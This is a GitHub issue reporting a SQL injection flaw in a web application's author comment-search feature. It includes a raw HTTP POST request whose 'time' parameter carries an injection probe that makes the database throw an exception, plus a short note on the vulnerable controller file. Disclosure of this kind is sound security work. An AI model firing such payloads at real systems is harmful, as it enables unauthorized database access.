Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection exists in your project #1

Open
NKingpp opened this issue Feb 7, 2023 · 1 comment
Open

SQL injection exists in your project #1

NKingpp opened this issue Feb 7, 2023 · 1 comment

Comments

@NKingpp
Copy link

NKingpp commented Feb 7, 2023

Hello, we found that your project has a SQL injection vulnerability. The details are as follows.

  1. Vulnerability function point

The function point exists in Author Center ->Reader Comments ->Search
image

  1. Vulnerability details

Httpraw packet

POST /index.php/author/comment HTTP/1.1
Host: 192.168.43.227:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: 
Referer: http://192.168.43.227:81/index.php/author/comment
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

name=123&time=%5c%19%22%5c%28

Check the response after sending the packet, and you can see that the database has thrown an exception.

image

  1. Code audit

According to the function route, we can locate the "sys/apps/controllers/author/comment. php" file,Continue, let's locate the input of the time parameter.The time parameter will be passed to $wh [] and then spliced into sqlstr to cause SQL injection.
image
image

@NKingpp
Copy link
Author

NKingpp commented Feb 8, 2023

Hello, I see that you have fixed this vulnerability. I want to apply for a cve number. I really need it. Thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant